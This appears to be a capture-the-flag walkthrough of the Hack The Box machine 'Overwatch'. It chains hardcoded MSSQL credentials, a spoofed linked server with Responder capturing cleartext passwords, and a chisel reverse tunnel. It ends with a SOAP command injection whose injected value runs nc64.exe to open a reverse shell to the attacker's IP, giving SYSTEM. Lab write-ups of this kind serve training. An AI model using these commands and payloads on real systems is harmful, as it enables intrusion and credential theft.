Hack The Box / WINDOWS / 2026-05-09
Hack The Box — Overwatch (Windows)
SMB share recon and .NET decompilation reveal MSSQL credentials, a linked server spoof with DNS + Responder leaks new creds, WinRM access exposes an internal SOAP service, and a KillProcess command injection yields SYSTEM.
Target
- IP:
10.129.16.251
Port Scan
sudo nmap -sC -sV 10.129.16.251 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-26 18:17:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after: 2026-06-08T15:16:06
| MD5: 0da8:f9a5:d788:e363:07b1:5f70:6524:ffcb
|_SHA-1: 3287:c62d:4408:7fbb:4038:00b3:32fa:da67:fb22:14bc
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-26T18:18:42+00:00
|_ssl-date: 2026-01-26T18:19:22+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2026-01-26T18:19:22+00:00; +1s from scanner time.
| ms-sql-ntlm-info:
| 10.129.16.251:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
|_ Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-26T17:15:52
| Not valid after: 2056-01-26T17:15:52
| MD5: f402:4e42:3ae9:0f9d:0337:bed9:a4c9:b4ea
|_SHA-1: fe57:f213:48f5:9bff:e0e5:83f1:6015:857a:cac8:5b07
| ms-sql-info:
| 10.129.16.251:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51470/tcp open msrpc Microsoft Windows RPC
51559/tcp open msrpc Microsoft Windows RPC
51797/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
51798/tcp open msrpc Microsoft Windows RPC
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host entries
Add these entries to /etc/hosts:
10.129.16.251 overwatch.htb
10.129.16.251 S200401.overwatch.htb
SMB Enumeration
List shares:
smbclient -N -L //10.129.16.251/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
software$ Disk
SYSVOL Disk Logon server share
Access software$:
smbclient -N '//10.129.16.251/software$'
dir
. DH 0 Sat May 17 08:27:07 2025
.. DHS 0 Thu Jan 1 13:46:47 2026
Monitoring DH 0 Sat May 17 08:32:43 2025
cd Monitoring
dir
There is an overwatch.exe, several DLLs, and an overwatch.exe.config file.
Mount the share locally and copy its contents:
mkdir mnt
sudo mount -t cifs '//10.129.16.251/software$' ./mnt -o username=hello,password=
cd mnt
zip -r ../stuff.zip *
Unmount it:
sudo umount ./mnt
Unzip the archive:
unzip stuff.zip -d software
Now we have all files offline in the software folder.
Open the folder in VS Code, install ilspy-vscode, and open overwatch.exe.
Expand overwatch.exe and inspect the MonitoringService module.
We find this connection string:
private readonly string connectionString = "Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;";
Credentials found:
sqlsvc / TI0LKcfHzZw1Vv
Credential Validation
Check SMB:
nxc smb 10.129.16.251 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv' --shares
SMB 10.129.16.251 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB 10.129.16.251 445 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB 10.129.16.251 445 S200401 [*] Enumerated shares
SMB 10.129.16.251 445 S200401 Share Permissions Remark
SMB 10.129.16.251 445 S200401 ----- ----------- ------
SMB 10.129.16.251 445 S200401 ADMIN$ Remote Admin
SMB 10.129.16.251 445 S200401 C$ Default share
SMB 10.129.16.251 445 S200401 IPC$ READ Remote IPC
SMB 10.129.16.251 445 S200401 NETLOGON READ Logon server share
SMB 10.129.16.251 445 S200401 software$ READ
SMB 10.129.16.251 445 S200401 SYSVOL READ Logon server share
The credentials are valid for SMB.
Check LDAP:
nxc ldap 10.129.16.251 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv'
LDAP 10.129.16.251 389 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
LDAP 10.129.16.251 389 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
They also work for LDAP.
BloodHound and LDAP domain dump
Collect BloodHound data:
bloodhound-ce-python -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv' -ns 10.129.16.251 -d 'overwatch.htb' -dc S200401.overwatch.htb -c All --zip
We get a ZIP.
Start BloodHound and import the ZIP. On Kali Linux:
sudo bloodhound
We can also enumerate the domain with ldapdomaindump:
ldapdomaindump 10.129.16.251 -u 'overwatch.htb\sqlsvc' -p 'TI0LKcfHzZw1Vv'
We see many users and several computers. The DC is S200401.overwatch.htb.
BloodHound does not show any special ACLs for sqlsvc, so we try MSSQL next.
MSSQL Access
Verify MSSQL login:
nxc mssql 10.129.16.251 --port 6520 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv'
MSSQL 10.129.16.251 6520 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
MSSQL 10.129.16.251 6520 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
Connect with mssqlclient.py:
mssqlclient.py -port 6520 -windows-auth 'OVERWATCH'/'sqlsvc':'TI0LKcfHzZw1Vv'@10.129.16.251
We get an MSSQL shell.
enum_db
name is_trustworthy_on
--------- -----------------
master 0
tempdb 0
model 0
msdb 1
overwatch 0
Enumerate tables:
select name from overwatch..sysobjects where xtype = 'U'
name
--------
Eventlog
Select the DB:
use overwatch
The prompt changes to:
SQL (OVERWATCH\sqlsvc dbo@overwatch)>
So we are DB owner and can do anything in this database.
Inspect the table schema:
SELECT COLUMN_NAME, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, IS_NULLABLE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Eventlog';
COLUMN_NAME DATA_TYPE CHARACTER_MAXIMUM_LENGTH IS_NULLABLE
----------- --------- ------------------------ -----------
Id int NULL b'NO'
Timestamp datetime NULL b'YES'
EventType varchar -1 b'YES'
Details varchar -1 b'YES'
Query the data:
select * from Eventlog;
No rows are present.
Check linked servers:
enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
------------------ ---------------- ----------- ------------------ ------------------ ------------ -------
S200401\SQLEXPRESS SQLNCLI SQL Server S200401\SQLEXPRESS NULL NULL NULL
SQL07 SQLNCLI SQL Server SQL07 NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
------------- ----------- --------------- ------------
Trying:
EXEC ('SELECT 1') AT [SQL07];
It times out, as if the server is unreachable. The idea is to spoof it and capture credentials.
Spoof linked server and capture credentials
We will add a DNS entry named SQL07 pointing to our IP.
Download BloodyAD: https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host S200401.overwatch.htb -d overwatch.htb --dc-ip 10.129.244.81 -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv' add dnsRecord 'SQL07' 10.10.14.29
[+] SQL07 has been successfully added
Start Responder:
sudo responder -I tun0
In the SQL shell, run:
EXEC ('SELECT 1') AT [SQL07];
Responder output:
[MSSQL] Cleartext Client : 10.129.244.81
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlmgmt
[MSSQL] Cleartext Password : bIhBbzMMnB82yx
From BloodHound, sqlmgmt is in the Remote Management Users group, so we can use WinRM:
evil-winrm -i 10.129.244.81 -u sqlmgmt -p 'bIhBbzMMnB82yx'
Internal service on port 8000
Check listening ports:
netstat -a -p tcp
We notice:
TCP 0.0.0.0:8000 S200401:0 LISTENING
Even though port 8000 was not shown by Nmap, it is likely filtered by the firewall.
Port 8000 is used by overwatch.exe, as we can see in the source. In overwatch.exe.config we find:
<baseAddresses>
<add baseAddress="http://overwatch.htb:8000/MonitorService" />
</baseAddresses>
Port forwarding with chisel
Download chisel: https://github.com/jpillora/chisel (Windows and Linux).
Upload the Windows binary to the victim.
On the attacker machine:
./chisel_linux server --reverse --port 9999
On the victim:
.\chisel_windows.exe client http://10.10.17.57:9999 R:8000
Browse to:
http://127.0.0.1:8000/MonitorService
The page says the WSDL is available at:
http://overwatch.htb:8000/MonitorService?singleWsdl
Since we forwarded the port, use 127.0.0.1:
curl 'http://127.0.0.1:8000/MonitorService?singleWsdl' > test.xml
xmllint --format test.xml > test_formatted.xml && mv test_formatted.xml test.xml
Add this entry to /etc/hosts:
127.0.0.1 overwatch.htb
The test.xml file contains the service definition. We can use the zeep Python library to parse it and call SOAP functions. Because of the port forward, we must reference 127.0.0.1.
Command injection in KillProcess
Among the SOAP methods, there is a KillProcess function:
public string KillProcess(string processName)
{
string scriptContents = "Stop-Process -Name " + processName + " -Force";
try
{
using Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
using Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(scriptContents);
pipeline.Commands.Add("Out-String");
Collection<PSObject> collection = pipeline.Invoke();
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject item in collection)
{
stringBuilder.AppendLine(item.ToString());
}
return stringBuilder.ToString();
}
catch (Exception ex)
{
return "Error: " + ex.Message;
}
}
This is clearly a command injection vulnerability. We can set processName to:
$(C:\tmp\nc64.exe -e cmd.exe 10.10.17.57 4444)
It will execute our payload and spawn a reverse shell. See command_injection_soap.py in the attachments folder.
Download nc64.exe from:
https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Upload it to C:\tmp on the victim (create the folder if it does not exist).
SYSTEM shell
Start a listener:
rlwrap nc -vlnp 4444
Run the script:
python3 command_injection_soap.py
We get a reverse shell:
whoami
nt authority\system